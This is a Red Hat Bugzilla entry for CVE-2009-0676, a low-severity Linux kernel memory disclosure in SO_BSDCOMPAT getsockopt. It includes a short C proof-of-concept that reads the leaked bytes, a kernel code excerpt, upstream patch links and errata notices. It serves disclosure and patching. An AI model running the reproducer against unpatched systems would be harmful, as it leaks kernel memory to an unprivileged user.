Bug 486305 - CVE-2009-0676 kernel: memory disclosure in SO_BSDCOMPAT gsopt
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
Version: unspecified
Hardware: All
OS: Linux
Priority: medium
Severity: medium
Assigned To: Red Hat Product Security
Whiteboard: public=20090211,source=lkml,reported=...
Keywords: Security
Depends On: 486514 486515 486516 486517 486518
Reported: 2009-02-19 05:18 EST by Eugene Teo (Security Response)
Modified: 2011-09-30 19:36 EDT (History)
Doc Type: Bug Fix
Attachments:
Upstream patch (1.38 KB, patch)
2009-02-19 05:32 EST, Eugene Teo (Security Response)

Description Eugene Teo (Security Response) 2009-02-19 05:18:20 EST
From Clement Lecigne:
In function sock_getsockopt() located in net/core/sock.c, optval v.val is not correctly initialized and is directly returned to userland in case the SO_BSDCOMPAT option is requested.

This dummy code should trigger the bug:

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>

int main(void)
{
	unsigned char buf[4] = { 0, 0, 0, 0 };
	socklen_t len = sizeof(buf);	/* was left uninitialised in the posted version */
	int sock;

	sock = socket(33, 2, 2);	/* family 33, type 2 (SOCK_DGRAM), protocol 2, as posted */
	if (sock < 0) { perror("socket"); return 1; }
	if (getsockopt(sock, 1 /* SOL_SOCKET */, SO_BSDCOMPAT, buf, &len) < 0)
		perror("getsockopt");
	/* leaked bytes, if any, appear here instead of four zeroes */
	printf("%x%x%x%x\n", buf[0], buf[1], buf[2], buf[3]);
	close(sock);
	return 0;
}

References:
http://lkml.org/lkml/2009/2/11/374
http://lkml.org/lkml/2009/2/12/123
http://patchwork.kernel.org/patch/6816/
Comment 3 Eugene Teo (Security Response) 2009-02-19 23:50:21 EST
This is a small infoleak. Do test the return values of socket() and getsockopt() in your testcase. You should be able to see the warning "process 'reproducer' is using obsolete getsockopt SO_BSDCOMPAT" in /var/log/messages.

sock = socket(2, 2, 0);
err = getsockopt(sock, 1 /* SOL_SOCKET */, SO_BSDCOMPAT, &buf, &len);

SYSCALL_DEFINE5(getsockopt, int, fd, int, level, int, optname,
                char __user *, optval, int __user *, optlen)
{
[...]
                if (level == SOL_SOCKET)
                        err =
                            sock_getsockopt(sock, level, optname, optval,
                                            optlen);
Comment 4 Eugene Teo (Security Response) 2009-02-23 21:32:02 EST
net: amend the fix for SO_BSDCOMPAT gsopt infoleak
http://marc.info/?l=linux-kernel&m=123540732700371&w=2
http://marc.info/?l=linux-netdev&m=123543237010175&w=2
Comment 7 Eugene Teo (Security Response) 2009-03-19 00:11:24 EDT
CVSS2 score of low, 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
Comment 8 errata-xmlrpc 2009-03-26 20:14:47 EDT
This issue has been addressed in following products:

  MRG for RHEL-5

Via RHSA-2009:0360 https://rhn.redhat.com/errata/RHSA-2009-0360.html
Comment 9 errata-xmlrpc 2009-04-01 04:30:59 EDT
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5

Via RHSA-2009:0326 https://rhn.redhat.com/errata/RHSA-2009-0326.html
Comment 11 errata-xmlrpc 2009-04-30 17:25:03 EDT
This issue has been addressed in following products:

  Red Hat Enterprise Linux 4

Via RHSA-2009:0459 https://rhn.redhat.com/errata/RHSA-2009-0459.html
